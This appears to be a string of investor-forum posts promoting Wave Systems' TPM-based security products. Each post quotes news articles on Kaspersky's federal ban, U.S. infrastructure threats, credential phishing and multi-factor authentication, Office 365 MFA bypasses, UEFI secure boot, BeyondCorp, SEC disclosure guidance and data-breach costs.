Kaspersky disputed that claim in its unsuccessful argument to the appeal court. Putting the congressional ban into effect will damage Kaspersky’s reputation—and its U.S. private-sector sales—even if the ban itself doesn’t lose the company any business, the motion said.
Kaspersky and the government are scheduled to make oral arguments in the case in September.
Congress is likely to enact similar governmentwide contracting bans targeting the Chinese companies Huawei and ZTE in the 2019 version of an annual defense policy bill that’s currently being squared away by a House-Senate conference committee.
The White House has proposed legislation that would make such bans easier in both civilian and defense agencies
https://www.wavesys.com/malware-protection
Excerpts:
Software can’t always detect malware
The big problem with malware is that antivirus software doesn’t always detect it. Anti-malware software is based on signatures of known bad software. However, there always needs to be a patient 0 that discovers he is infected, for the rest of the world to benefit from it. In the case of APTs (Advanced Persistent Threats), your organization may be the only target for the specific strand of malware. In that case, the signature detection process will not protect you. Modern anti-malware and other software packages that promise cyber security or protection from APTs would use various heuristics and "AI" (Artificial Intelligence) to detect malware based on a predefined set of behavioral parameters. A sophisticated attacker is able to fine tune the behavior of the malware he is writing against various known anti-malware software solutions, so that it can evade detection for long periods of time.
A further challenge for anti-malware software is that it commonly works at the OS level. It isn’t very good at seeing deeper into the system, where some malware lives. Malware can hide from anti-malware by feeding it false results as it lies lower in the stack.
APT's extent seems wider each week. News stories about targeted attacks on organizations appear weekly. Even more stories do not appear, as some malware is not detected for very long periods of time. Some malware described as "cutting edge" has code components that have been available for 3 and 4 years, thus dating their undetected time of life in the wild. With online tools, even a non-technical person can create one easily. And there are more ways than ever for malware to spread: the Internet, personal computing devices, downloads, email, social media sites. Government agencies recognize it as a growing threat. Early detection is the highest priority in this Cyberwar. In 2011 NIST published guidelines for establishing a chain of trust for the basic input/output system (BIOS), which initializes a computer when it boots up. This critical system is one of malware’s more consequential targets and an area specifically protected by Wave Systems in its products and in its thinking.
Wave’s solution: start with the device
If antivirus software doesn’t work, what does? The Wave alternative relies not on superficial layers of software but on standards-based hardware: self-encrypting drives (SEDs) and Trusted Platform Modules (TPMs), or security chips, that are already embedded in many of your computers and mobile devices. This hardware provides you with secure storage. When you turn the SED and TPM on and manage them with Wave, you suddenly have a broad, deep view into your network. Among other things, you’ll know immediately whether any one of your devices—computers, laptops, tablets, smartphones—has been tampered with. But Wave is proactive too: you can block the kinds of behaviors that invite malware in. Wave's Endpoint Monitor provides early detection for these low-lying sneaky attacks.
Which other attack vector should you watch? One common vector that is used to attack even the most secure networks is physical devices – connected to USB, FireWire or SD. Our Data Protection Suite AV scanner allows you to block any unscreened device from connecting to any machine in the organization, until it has been scanned for known malware.
U.S. intelligence chief lays out threats to U.S. infrastructure, efforts to protect it.
The government hasn't opted for 'The Wave alternative as part of its cybersecurity protection and it seems like this is a missing link in its cybersecurity strategy.
https://www.wavesys.com/solutions
The Wave alternative is to start with the device. The security is built in—part of the hardware—not added on. With the device as your foundation, you have unprecedented yet straightforward control over exactly who has access to your data, with what devices, over what networks, which eliminates much of that complexity, stress, and expense. Total cost of ownership for Wave data protection can be almost half that of a traditional software-based system.
https://www.cyberscoop.com/dan-coats-hudson-institute/?utm_campaign=CyberScoop%20-%20Editorial&utm_content=74346921&utm_medium=social&utm_source=twitter
The top U.S. intelligence official painted a grim picture on Friday of the many types of cyber threats the U.S. faces across critical infrastructure sectors and highlighted the ways the government is countering them.
“These attacks come in different forms. Some are tailored to achieve very tactical goals, while others are implemented for strategic purposes, including the possibility of a crippling cyber attack against our critical infrastructure,” said Director of National Intelligence Dan Coats, speaking at the Hudson Institute, a Washington, D.C. think tank.
“But all of these desperate efforts share a common purpose to exploit America’s openness in order to undermine our long-term competitive advantage.”
Coats said that U.S.’s digital infrastructure is under constant attack from foreign entities including China, Iran and North Korea, but he singled out Russia as the “most aggressive” one, highlighting the country’s reported efforts to use hacking and information campaigns to influence U.S. elections.
The director sought to clarify recent comments from a top DHS official, that suggested that the intelligence community has seen a decline in intent from Russia to interfere in future elections.
“I think there may have been some confusions on what we were seeing now compared to what we saw in 2016 because the Department of Homeland Security noted we are not yet seeing the kind of electoral interference in specific states and in voter databases that we experienced in 2016,” Coats. “We are just one click of the keyboard away from a similar situation repeating itself.”
Coats’ talk took place within hours of the Department of Justice announcing new indictments of 12 Russian intelligence officers for allegedly hacking into the Democratic National Committee and other election-related entities in the run-up to the 2016 election.
But Coats also warned against having tunnel vision focused on the elections, noting that foreign actors continually target other aspects of U.S. critical infrastructure.
“DHS and FBI, in coordination with international partners detected Russian government actors targeting government and businesses in the energy, nuclear, water aviation, and critical manufacturing sectors. the warning signs are there. The system is blinking and it is why I believe we are at a critical point,” he said.
A silver lining that Coats pointed out is that the intelligence community is more integrated and better at sharing information across the 16 agencies that make it up than in past years. However, he said, challenges remain when it comes to coordination between the IC and the private sector organizations that are tapped into the threats U.S. infrastructure faces.
“The respective self-interest of the government, the private sector and the public have created independence rather than complementary lines of effort and awareness,” Coats said. “Everyone, if we are to succeed in dealing with this threat, must take ownership of the challenge.”
Coats noted that in order to actively counter the threats the country faces, President Donald Trump has authorized several actions, including attribution, criminal indictments and economic sanctions – all of which the administration has recently used.
The director said that the National Security Council, which plays a significant role in the White House’s cybersecurity strategy, is working to make sure the issue of foreign cyberthreats is a top priority for the White House despite being in a “transition period.”
“Transition” is not an understatement. Trump recently brought on John Bolton to replace H. R. McMaster as his national security adviser. Bolton ushered in a series of changes, including nixing the role of White House cybersecurity coordinator. Eliminating the role has been a contentious issue and lawmakers have urged the White House to reinstate it.
Credential Phishing – Easy Steps to Stymie Hackers
There are so many ways that Wave VSC 2.0 is better than the solutions offered up in this article. Interesting that the author use to work for the Army and doesn't mention Virtual Smart Cards or Windows Hello as a MFA solution. Given the author's initial line of, "I have to admit that I am a big fan of hardware-based token," virtual smart cards would seem like his next obvious recommendation.
https://securityboulevard.com/2018/07/credential-phishing-easy-steps-to-stymie-hackers/
Phishing attacks have become a common factor in our daily routines for businesses and in our personal lives. There are many different types of phishing attacks, each of which requires a slightly different defense while having some commonalities as well. This article covers a specific type of attack called credential phishing and ways to protect against it. While you may have heard of this type of attack, many people do not fully understand the different types of credential phishing, their goals, and how to defend against them. Time to remedy that!
Types of Credential Phishing Attacks
Generally speaking, most credential phishing attacks have a common, obvious purpose – to gather credentials from an individual. However, what attackers do with that information and the creativity used in the attack can vary greatly. In some cases, the credentials can be used to gain access to systems or network resources, while in others they can be used to take over bank accounts, social media accounts or email accounts. In any of these cases, the damage the attacker can do can be harmful to the organization or individual, both reputationally and financially.
A couple of months ago, I spent some time in Washington, DC, where I was honored to speak to members of several different House Subcommittees ranging from those focused on financial crimes and terrorism to consumer protection and intelligence services. After one of the briefings, I spent some time speaking with a member of the U.S. Secret Service. He told me a story about a case he just finished working. Sadly, this was a scenario that I already knew too well through others impacted by the same scenario.
In this case, the attacker was able to gain access to an individual’s email account through a credential phishing email. This victim worked in the real estate industry and was working on some reasonably large deals. The attacker stayed quiet and monitored the victims emails for about a month before springing the attack. In this case, when it was time to transfer the escrow funds, the victim sent the account information for the transfer to the sender. Immediately afterword, the attackers made their move, and from the legitimate account of the victim, sent another email with a “correction” to the account number. The result was about $500,000 wired to the attacker’s bank account in another country, and it happened in the blink of an eye.
The FBI calls this kind of attack Business Email Compromise (BEC), and there are many different variations. This escrow/earnest money transfer attack is just one of many. I have seen attacks diverting funds for invoice payments, false invoices being generated and sent from legitimate accounts and malware being spread through legitimate, “trusted” accounts are just a few others. This doesn’t even touch on the CEO fraud versions of this type of attack, which occurs when the CEO makes an urgent request for a funds transfer or to send tax forms for the employees. These attacks are so lucrative, Trend Micro is expecting the losses to exceed $9 billion by the end of this year, and the FBI has already tallied $5.3 billion in losses back in 2016.
In addition to these types of attacks, if you own the user’s email account, password resets for other types of accounts using that email address become trivial.
Fighting Back Against Credential Phishing
So, how do we fight back against these sorts of attacks? Generally speaking, the most effective countermeasures I have seen are:
1.Training the users to spot these attacks
2.Using Multi-Factor Authentication (MFA) to secure the accounts.
When it comes to training users to spot these attacks, we need to understand that the days of the Nigerian prince scams are largely behind us. Modern attacks are well designed and can be tough to recognize.
For example, the following credential phishing pages are from the KnowBe4 simulated phishing platform and are indicative of credential phishing pages used in the wild.
As you can see from the examples, these pages are made to look exactly like the real login pages for these services, and they can be easily hosted on any web server. Most of the time, when the user enters the credentials, the page not only captures those credentials, but it also forwards them to the actual login page, which then logs in the user, and they never know that they just gave up their credentials. Even in cases where the user is not automatically logged in, the page will usually just show a “Bad username or password” error, prompting him/her to log in again. Because all of us have mistyped a password before, this typically goes unnoticed and the user thinks they just fat-fingered the keys, once again leaving them oblivious to the harvesting of their credentials.
We must train users (and ourselves) to hover over the link in emails to ensure they are going to where they say they are, and to glance at the URL bar before ever entering login credentials on a page.
The second thing we need to do is to enable Multi-Factor Authentication (MFA) on these accounts wherever possible. This means not only do you need to have a username/password combination, but you also need to have another means of authentication. This can be biometrics, a text message to your phone, an authenticator app such as Google Authenticator, or, my favorite, a hardware token like a YubiKey.
When I worked for the U.S. Army, we used something called a Common Access Card (CAC) that contained a set of Personal Identity Verification (PIV) certificates that were tied to Active Directory. These PIV certs allowed us to digitally sign emails, encrypt emails, log in to computers on the domain, and even to control physical access to some areas in the buildings. These devices were a 2-Factor Authentication (2FA) device, as they required you to physically have the card, and also required you to know a PIN number to unlock the certificates on the card. Without one or the other, the operation would fail.
This same MFA principle should be applied to the email accounts of your users, especially the sensitive ones. Here are a few types of MFA to consider:
SMS
Using SMS as a second factor is a topic of debate amongst security professionals as cell phones/SIM cards can fairly easily be spoofed. Personally, I believe that something is better than nothing in this regard, so if this is the only option you have, go ahead and use it.
I will caution you, if you enable SMS as a second factor, avoid using numbers that are tied to services that forward SMS to email. For example, if I enable the SMS second factor in my Google account and have the message sent to my Google Voice number, I run the risk of it being more easily intercepted in email and potentially risk locking myself out of my account. Consider this, if I need the SMS message to get in to my Google account, and it’s being sent to my Google account… It’s just better to send it straight to a phone number. Trust me, I have learned from experience.
Software Authenticators
Another option is software-based authenticators such as Google Authenticator or Duo Security. This application is typically set up using a “shared secret” key that then uses that key to generate a numeric code you can enter into the requesting application. For example, if I set this up as a second factor for my Google account, when I log in, I will be prompted to enter the code. I would open the app on the phone and enter the code for that account. Unlike SMS codes, the One-Time Password (OTP) code generated by this type of application has a short lifespan, typically about one minute, before expiring and generating a new code.
Hardware Tokens
I have to admit that I am a big fan of hardware-based tokens. When I used smart cards in the DoD, I gained a great deal of respect for the abilities of these devices. Typically, these hardware devices will be used to generate OTPs or will store the PIV certificates for that user. As I mentioned previously, these hardware generated codes or PIV certificates are a very strong authentication mechanism.
One problem that plagued smart cards in the DoD was a very high failure rate. Our organization had roughly 300 people using these cards with some users having multiple cards for different accounts. In this organization it was not uncommon to replace 2-3 cards a week due to failure. Smart cards have exposed contacts, much like newer chip-enabled credit cards, and require a special reader to be used.
For these reasons, I don’t recommend smart cards for the typical organization, however there are other options that address these issues.
There are a lot of options for similar devices that can make these same improvements in security while being much easier to use and more reliable. A quick search on Amazon for FIDO U2F will give you some options to peruse. Be sure to pick the ones that support your required authentication protocols and methods.
I have been using a device called a YubiKey which is produced by Yubico. These devices act very much like smart cards but plug directly into a USB port and are much more reliable. I have used these devices to store Active Directory PIV certificates and for OTP generation as well. Some of these devices also allow for Near Field Communication (NFC) connectivity as well as USB connectivity. These support multiple authentication protocols and methods including FIDO2, WebAuthN, U2F, smart card (PIV), Yubico OTP, Code Signing, OpenPGP, OATH-TOTP, OATH, HOTP, and Challenge-Response.
Aside from a second factor for account authentication, one of my preferred use cases for these devices is securing password vaults such as LastPass. This allows for a very secure second factor to lock down the vault and associated passwords. The YubiKey Neo is handy, as it can be used through NFC to unlock the password vault even on cell phones.
Another consideration for these devices is the protection of very high-value accounts in Active Directory. I have used these to secure domain and enterprise administrator accounts using smart card login and PIV certificates, which have been natively supported since Windows 2000. That, however, is a topic for another post.
While these devices are typically pretty rugged and convenient, the cost and the requirement to physically have the device can be an issue. I have left my keychain with the YubiKey at home and left on a trip. This can be very inconvenient and can be a challenge to work around if you do not configure a backup method of authentication.
Setting Up MFA
Securing accounts with multi-factor authentication is becoming much easier as more and more vendors add native support for the technologies. Twitter, Facebook, Office 365, Dropbox, GitHub, Google, and many others already allow you to secure your accounts with MFA. Below are a few examples of what these pages look like when enabling MFA.
Summary
Credential phishing and BEC attacks are continuing to cripple organizations across the globe. The attacks are well planned and executed and often very stealthy. Combining high-quality end user training and multi-factor authentication can significantly reduce the risk of damages resulting from a successful credential phish. While this is not a solution to all of the issues surrounding credential phishing, requiring that additional layer of authentication that is tough for the attackers to obtain, can significantly reduce the risk of damage if a user is tricked into giving up their username and password.
The balance between usability and security is always tricky, but the industry as a whole is making it less painful when adding more layers of security. Therefore, review the available options for multi-factor authentication, especially for high value accounts and especially for all email accounts, and your organization as well as you as an individual should enable this additional security wherever possible. Strongly consider the addition of a password vault system as well, which can reduce password reuse across sites and allows for quick, easy password changes.
While nothing is 100% secure, most of these setups are extremely difficult to break. Any determined attacker can eventually get their target. However, these simple measures go a very long way in helping you rise above being the low hanging fruit, making the bad guys simply go on to an easier mark.
Two-factor auth totally locks down Office 365? You may want to check all your services...
A great solution to the problem below. imo.
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.theregister.co.uk/2018/07/13/2fa_o365_bypass_attacks/
A network's only as strong as its weakest link or worker
Hackers can potentially obtain access to Microsoft Office 365 emails and calendars even if multi-factor-authentication is in place, we were warned this week.
Cybercrooks are able to force their way into corporate Office 365 accounts, bypassing single sign-on or multi-factor authentication, by targeting older systems that aren't well protected, email security biz Proofpoint has argued.
The trick, we're told, is to target legacy services that use weak or known passwords, are not secured behind multi-factor-authentication, and, once commandeered, can be used to poke around inside a corporate structure. If you don't know a target's password, it could be phished via email or instant message.
This all may seem obvious, but apparently some people are being stung by it.
"The current wave of attacks mostly goes after Exchange Web Services and ActiveSync," said Ryan Kalember, Proofpoint's senior vice president of cybersecurity strategy, earlier this week. "A little real-time phishing gets mixed in, but is usually not necessary."
Real-world examples
For example, Proofpoint said it recently saw an attacker access the Office 365 account of the chief exec of a 15,000-user financial services and insurance firm. The hacker viewed the CEO's emails and calendar in order to sniff out an opportunity to run a sneaky scam.
At the same time the chief exec was in scheduled meetings with suppliers, the intruder used the compromised account to send an email to the chief financial officer asking for funds to be shifted. The unnamed financial services firm lost $1m over the course of several transfers, it is claimed.
Compromised Office 365 accounts in a 75,000-user real-estate investment biz were used to run another scam. Five executives, including some regional general managers, had their accounts compromised. With access to their Office 365 email, attackers managed to change the ABA routing numbers for corporate funds. The company lost over $500,000 as a result, according to Proofpoint.
By the most remarkable of coincidences, the security shop has released something called Proofpoint Cloud Account Defense (CAD) to detect and proactively protect against compromised Microsoft Office 365 accounts. Kalember explained the need for additional layers of defenses.
"It's really hard for most orgs to cover all the interfaces to Exchange with MFA [multi-factor authentication]," Kalember told El Reg.
"Particularly with EWS [Exchange Web Services], you need to be 1) fully migrated to O365, 2) use Microsoft's own MFA, and 3) in Modern Authentication mode. The tech can't support native iOS/Android mail clients, etc."
In other words, you may think you're fully protected – but maybe you should double check, and increase defenses for all service interfaces, particularly concerning Exchange Web Services. Save yourself some pain in the future. ®
From computers to mobile - The TPM could be ready to shine!
AMI @AMI_PR has added TPM support for Arm-based systems currently running AMI's Aptio® V UEFI firmware. Users can expect the ability to better secure their systems and the information stored within them. http://ow.ly/O2Rc30kUnhr
see post 245219 as well.
AMI @AMI_PR has added TPM support for Arm-based systems currently running AMI's Aptio® V UEFI firmware. Users can expect the ability to better secure their systems and the information stored within them. https://t.co/bbSRotmudl
— Trusted Computing (@TrustedComputin) July 11, 2018
American Megatrends Adds TPM Support on Arm-based Systems Running Aptio® V UEFI Firmware
see wavesys.com for Wave Endpoint Monitor
https://ami.com/en/news/press-releases/american-megatrends-adds-tpm-support-on-armbased-systems-running-aptio-v-uefi-firmware/
Wednesday: May 2, 2018
NORCROSS, GEORGIA: - American Megatrends Inc. (AMI), a global leader in BIOS and UEFI firmware, server and remote management tools, data storage products and unique solutions based on the Linux® and Android™ operating systems, is pleased to announce support for TPM on Arm®-based systems running AMI’s flagship Aptio® V UEFI Firmware.
The Trusted Platform Module (TPM) is defined in the TPM Main specification created by the Trusted Computing Group, which enables trust in computing platforms. TPM can be used to measure the code that will be executed (known as measured boot), authenticate and secure platforms using passwords, certificates, digital signatures and/or encryption keys. Incorporating TPM provides an extra layer of security to ensure that important information is not prone to outside software attacks and/or unauthorized updates.
Previously, AMI only provided TPM support for x86 platforms. With the growing need to extend TPM support for additional platforms, AMI has added TPM support for Arm-based systems currently running AMI's Aptio® V UEFI firmware. Users can expect the ability to better secure their systems and the information stored within them. The added TPM support for Arm-based systems includes features specifically for the Arm architecture such as TPM driver support within Arm® TrustZone® technology and Linux OS support. The Arm TrustZone TPM Firmware can be accessed by the BIOS and OS via the Command Response Buffer interface using Secure Monitor calls. Other generic features supported by TPM include cryptographic algorithms and measurement of SecureBoot variables.
American Megatrends and Wave to Extend UEFI Support in Windows 8 for BIOS Malware Detection
Friday: February 24, 2012
https://ami.com/en/news/press-releases/american-megatrends-and-wave-to-extend-uefi-support-in-windows-8-for-bios-malware-detection/
Central to Windows 8 is the use of Aptio®, AMI’s solution for UEFI (Unified Extensible Firmware Interface), which represents an overhaul of the computer boot environment, while still bearing similarities to the legacy BIOS (Basic Input Output System) it replaces. The UEFI specification introduces advanced firmware features defining boot and runtime protocols for communications between services, device drivers and offers a standard interface to the operating system. Providing standardized access to boot data optionally stored on either NAND flash or on a hard drive, Aptio provides more space for boot-time diagnostics and running utilities. The result is dramatically faster boot-up times and better performance.
Windows 8 takes advantage of UEFI secure boot architecture to enhance the operating system’s security capabilities. Secure boot allows only signed software to run on the device, adds cryptographic checks to each stage of the boot process and asserts the integrity of all the software images that are executed to prevent unauthorized, modified software from running. Wave solutions report on the execution of the secure boot and verify that anti-malware software has been launched before any third-party boot drivers to prevent malware from bypassing inspection.
Building a “chain of trust” requires the collaboration of multiple partners. AMI provides the first step in the trust chain by assuring that the BIOS components are registered and signed prior to the delivery of the platform. As the computer boots, each component reports its status to the Trusted Platform Module (TPM), which securely records the status measurements. This provides a critical first step that sets the stage for a more trustworthy computing environment.
Wave constitutes the next link in the trust chain with solutions designed to assure that the integrity of the secure boot is reported and attested to the enterprise network or Cloud service. Wave Endpoint Monitor, currently deployed in beta testing, uses the TPM to report on the success of the secure boot and leverages the chip to prove that the process has executed correctly. Endpoint Monitor can then prove to a Cloud service or to an enterprise application that the PC has booted in a known, good state. If a platform is compromised, IT can determine which machine is infected, and take steps to prevent it from accessing sensitive systems to ensure that critical systems and data safe remain safe.
“Securing the computer from power on is critical to the defense of intellectual property and the corporate infrastructure,” remarked S. Shankar, President and CEO of American Megatrends. “AMI is pleased to provide Microsoft with the foundation of security for Windows 8, and to work with Wave to extend security capabilities that wouldn’t have been possible in a legacy environment.”
Steven Sprague, Wave’s CEO commented, “AMI and PC manufacturers offer great assurance that the UEFI components are trusted when delivered to the customer. Wave provides IT with a greater level of knowledge and trust in the boot process and assurances that only known devices are on the network. Knowing the identity of the machine and assuring the health of its BIOS represent significant strides forward in combating advanced persistent threats.”
AMI has spent the last year supporting the launch of Windows 8 by ensuring that AMI’s Aptio UEFI firmware is in full compliance with the latest UEFI specification, UEFI 2.3.1. New features include pre-OS security, speed and secure boot. AMI is also working with PC OEMs, developers and partners such as Wave by providing UEFI development PCs for testing within a Windows 8 ecosystem. AMI has worked in partnership with Microsoft to develop this system in order to facilitate the rapid development of Windows 8 throughout the entire developer community. These new UEFI development PCs are powered by the latest version of Aptio, version 4.6.5.1, which not only offers full support for Windows 8, but also adds support for the latest UEFI specifications, UEFI 2.3.1 and PI 1.2. This makes the latest features of the UEFI specification, such as Secure Boot, UEFI boot mode, fully localizable user interface and more, available to manufacturers in a production-ready UEFI BIOS. Notably, this development system will be the first PC on the market with full UEFI 2.3.1 support, allowing for a complete Windows 8 experience.
In preparation for Windows 8 availability, Wave is using some of the capabilities of the TPM to enable an enterprise infrastructure to support the features in Windows 8 that take advantage of UEFI capabilities. Enterprises stand to benefit from a tool that can detect rootkits, assure the core capabilities of a platform and establish very strong device identity—capabilities that have been missing for the last 20 years and critical to establishing a more trustworthy computing environment.
Phone in the right hand? You're a hacker!
How effective really is a continuous monitoring/automation and assuming all users in the network are hostile (Beyond Corp.) vs. only known devices being allowed on certain parts of the network. The moat approach (anti virus and firewalls) isn't very effective either. imo. Wave's website has the following excerpt:
https://www.wavesys.com/solutions
Much of the complexity, stress, and expense of data protection stems from hanging on to a failed, 20th-century approach to the problem. Namely, piling on layers of software in an attempt to keep the bad guys and their viruses out. But there is no “in” to keep them out of anymore. Consider today’s increasingly mobile workforce, the proliferation of personal devices, and the growing use of web applications—all of which cyber criminals have learned to take advantage of.
The Wave alternative is to start with the device. The security is built in—part of the hardware—not added on. With the device as your foundation, you have unprecedented yet straightforward control over exactly who has access to your data, with what devices, over what networks, which eliminates much of that complexity, stress, and expense. Total cost of ownership for Wave data protection can be almost half that of a traditional software-based system.
https://www.bbc.com/news/technology-44438808
Hackers are finding it too easy to circumvent traditional cyber defences, forcing businesses to rethink their security strategies. Many firms are now harnessing big data and adopting cutting edge verification checks. In fact, some can even identify you by how quickly you type your computer keys, or how you hold your mobile phone.
In these days of regular space travel, nanotechnology and quantum computers it is easy to believe we live in an age plucked from the pages of a science-fiction novel.
But there are some aspects of this shiny, computer-powered era that look more feudal than futuristic.
Consider the way many organisations protect themselves and their staff from cyber-attacks.
Many approach cyber-security like a medieval king would have tackled domestic security - by building a castle to protect themselves, says Dr Robert Blumofe, a senior manager at cloud services firm Akamai.
The high walls, moat and drawbridge are the security tools, anti-virus and firewalls they use to repel the barbarians at the gates trying to breach their cyber defences.
"But now," Dr Blumofe says, "that castle metaphor is really starting to break down."
Outer defences
The first issue is mobility. Digital fortifications worked well when all staff sat at desks, used desktop computers and were concentrated in a few buildings.
But now many work from home, airports or coffee shops and use their laptops, tablets and phones on the go, to work at all times of day.
The second problem, Dr Blumofe says, is that many firms wrongly assume that those in inside their castle walls can be trusted and are "safe".
This leaves many firms dangerously exposed, agrees John Maynard, European head of cyber-security for Cisco.
"Typically once attackers have penetrated a trusted network they find it is easy to move laterally and easy to get to the crown jewels.
"That's because all the defences point outward. Once on the inside there is usually little to stop attackers going where they want to."
Tumbling walls
In a bid to get beyond this outdated thinking many organisations have torn down the old castle walls in favour of a model known as the "Beyond Corp" approach.
It was pioneered by Google in response to a series of cyber-attacks in 2009 called Aurora orchestrated by China-backed hackers. The attackers went after Google as well as Adobe, Yahoo, Morgan Stanley, Dow Chemical and many other large firms.
According to Mr Maynard, Beyond Corp assumes every device or person trying to connect to a network is hostile until they are proven otherwise.
And it obtains this proof by analysing external devices, how they are being used and what information they are submitting.
This encompasses obvious stuff such as login names and passwords, as well as where someone logs in from; but it also relies on far more subtle indicators, says Joe Pindar, a security strategist at Gemalto,
"It can be how quickly do you type the keys, are you holding the device in your right or left hand. How an individual uses a device acts as a second layer of identity and a different kind of fingerprint."
Gathering, storing and analysing all that data on those individual quirks of usage was the type of big data problem only a tech-savvy company such as Google could tackle at the time of the Aurora attacks, says Mr Pindar.
However, as familiarity with big data sets has spread, many more big firms are adopting the Beyond Corp approach when organising their digital defences, he says.
One big advantage is that Beyond Corp turns a firm's network into an active element of defence, says Mr Maynard from Cisco.
"In the castle and moat approach the network was passive... But beyond Corp involves continuous monitoring where you are constantly using the network as a sensor or a way to get telemetry about what's going on."
The analysis done when users join a network makes it much easier to spot when attackers are trying to get access. That's because the authentication step will flag any anomalies meaning security staff will find out quickly that something suspicious is going on. Anything other than normal login behaviour will stand out.
Faster detection
It can also mean a "significant reduction" in time to detect threats, says Mr Maynard.
"The industry average is about 100 days to spot threats. With Beyond Corp you should be down to hours not days."
In addition, Beyond Corp can "limit the blast radius" if a breach does happen, says Stephen Schmidt, chief security officer at Amazon's AWS cloud service.
This is because it usually involves dividing up a company's internal network so users only get access to applications they are approved to use.
The mass of data gathered on users, their devices and the way they act once they have connected may appear bewildering to many companies.
However, advances in automation are increasingly helping them keep a handle on the millions of events that now occur on their systems.
"If you are expecting to secure your estate by having humans watch TV screens you are probably going to be too late to spot it," says Mr Schmidt. "Human reactions are always going to be much slower than automation."
SEC Cybersecurity Update May Lead to Increased Oversight
https://www.infosecurity-magazine.com/opinions/sec-update-increased-oversight/
In direct response to an unprecedented streak of massive data breaches and security incidents, the SEC recently released a statement and guidance on public company cybersecurity disclosures. The SEC's guidance has two major focuses: the importance of cybersecurity policies and procedures and the application of insider trading prohibitions in the cybersecurity context.
While signals are mixed, the SEC appears to view cybersecurity policy and practice as central to protecting markets. To quote from the SEC's February statement: “Today, the importance of data management and technology to business is analogous to the importance of electricity and other forms of power in the past century.”
Prognosis
To be clear, the updated guidance is not a formal regulation, so companies may choose to review and fix policy management issues — or they may ignore it altogether. Savvy corporate information security executives will internalize that this pointed focus on cybersecurity means increased oversight is soon to follow. We see this guidance as a precursor to regulations that could grow into a regime on par with SOX.
This prediction is supported by a few key factors:
Precedent — The New York State Department of Financial Services, 23 NYCRR 500, Cybersecurity Requirements for Financial Services Companies. See also state-level notification laws and the EU’s GDPR.
Avalanche — Financial sector breaches have tripled in five years.
Driver — Investors are seeking risk awareness to ensure they have all the facts for prudent investments.
Most experts and market watchers are discussing the SEC guidance in terms of how public companies will and should react to it. The untold story is that the guidance is likely a precursor to increased oversight. We’ve seen it happen in other sectors with governing bodies, such as in financial services with the FFIEC.
The SEC’s renewed focus on cybersecurity and data breaches is a good news/bad news scenario for CISOs. CISOs can leverage the gravity of SEC oversight into increased visibility and authority in the boardroom, as CEOs and CFOs now have greater risk management responsibility and accountability to investors. On the other hand, CISOs also now face heightened scrutiny and greater accountability, including the potential for more significant personal penalties.
Questions and Concerns
Most public companies are already straining under the weight of regulatory burdens and have invested heavily in their cybersecurity defenses. What more can they do?
The SEC guidance can be seen as a response to, and hedge against, the negative impact of massive breaches on public trust – already at a remarkably low point. Headline-worthy breaches keep happening. The full fallout from the Equifax disaster may still be coming. Target still finds itself getting press five years after its data breach.
While public companies have less and less say over what they disclose, it is important to examine the trust issue from a strategic standpoint: What effect will more disclosures have? What will happen to companies that fail to disclose in a timely and transparent manner? The SEC has already provided one answer, in the form of a $35 million penalty against Altaba (Yahoo) for failing to disclose a massive breach in 2014.
Urging public companies to do a better job of incident response, through integrated policies, procedures, controls, and collaboration, in the event of a breach or cyber-attack is only one part of the guidance.
Another major area of focus is risk management — the SEC emphasizes that investors have a right to be notified of major risk factors, even before a negative event occurs. This means public companies, which often leverage complex global supply chains, will likely need to improve their enterprise risk management programs to gain the visibility and agility required to achieve a proactive state.
Answers and Insights
The next step is to integrate all the components — cybersecurity, data privacy, data integrity, compliance, audit, business resiliency and third-party management — merging and managing them through an integrated risk management program and solution.
These technology platforms support risk management effectiveness and policy management best practices, a core aspect of the SEC update. Organizations with solid integrated risk management programs are able to leverage their visibility into various components – vendor risk, audits, etc. -- to make IT risk management more effective and actionable.
By systematically linking policies to controls, it becomes easier to prove compliance and diligence. The linkages provide a defensible record, essential to withstanding public scrutiny and investigations. Everything can be documented, from the publication and distribution of policies to training and testing, and then investigation, corrective actions, and follow-up reports.
Moreover, policies managed through integrated risk management solutions can be created and updated efficiently in response to business or regulatory changes.
A quick scan of the SEC guidance (and most other cybersecurity directives) reveals a daunting number of details and convoluted processes that need to be addressed. That’s why automation is so vital to achieve excellence in risk management.
Streamlining workflows, centralizing documentation, freeing data from silos, and systematizing processes — all these capabilities save time and money, but they also increase visibility across the enterprise, enable collaboration, and bridge vulnerable gaps.
In the end, the issues raised by the SEC’s updated guidance are important for every organization. Cultivating corporate responsibility, sustaining consumer trust, protecting valuable data assets, and maintaining the integrity of critical ecosystems are all essential to long-term success and competitive advantage.
Digging deep to identify vulnerabilities, track improvements and outcomes, and ensure accountability will create a stronger, more resilient organization.
IBM: A data breach will now cost your organization $3.86 million, if you're lucky
See wavesys.com on how to use better cybersecurity and prevent potential enormous future breach costs. imo.
https://www.zdnet.com/article/ibm-a-data-breach-will-now-cost-your-organization-3-86-million/
There are hidden costs over time which make the bill far larger than you may expect.
A new global study conducted by IBM suggests the financial impact of a data breach for an organization is, on average, $3.86 million.
However, in the worst cases, "mega breaches" may cost the enterprise between $40 million and $350 million.
IBM's 2018 Cost of a Data Breach Study, conducted in conjunction with the Ponemon Institute, suggests that the cost can become this high not due to the obvious damage caused by systems -- or the theft of information at the time of a breach -- but rather due to more subtle expenses incurred by an organization.
A loss of reputation may deter potential future customers, current business relationships may falter, and the time employees must spend on damage control -- as well as retraining and education -- may all rack up the bill.
According to the study, the average cost of a data breach, $3.86 million, has increased by 6.4 percent from 2017.
After interviewing close to 500 companies which have experienced a data breach, the study calculated that this is the average cost when under 100,000 records are compromised in a cybersecurity incident.
The average time it took to uncover a data breach is 197 days, and once identified, it takes roughly 69 days to contain.
However, the speed of incident response teams can have a huge impact on the overall cost of a data breach.
When a breach is contained in less than a month, IBM suggests businesses may be able to save up to $1 million in comparison to slower companies.
The amount of records stolen also has an effect. On average, each record costs $148, but this cost can be mitigated by having an incident response team on hand, as well as by implementing artificial intelligence (AI)-based cybersecurity solutions.
"Organizations that had extensively deployed automated security technologies saved over $1.5 million on the total cost of a breach," IBM says.
The study has also examined the cost of so-called "mega breaches," in which cyberattacks result in the loss of one million to 50 million records. In these cases, enterprise players can expect to lose between $40 million and $350 million -- but one-third of this estimated cost is caused by lost business.
A recent IBM/Harris poll suggested that 75 percent of US consumers would not do business with a company they did not believe would take adequate measures to protect their data. When you consider that this aversion may be for years -- or permanent -- the true cost of data breaches to an organization may be incalculable.
Based on 11 companies experiencing this level of a data breach in the past two years -- such as Equifax and Target -- the study suggests that the majority of these security incidents are malicious rather than caused by human error, and the average time to detect and contain a breach was 365 days.
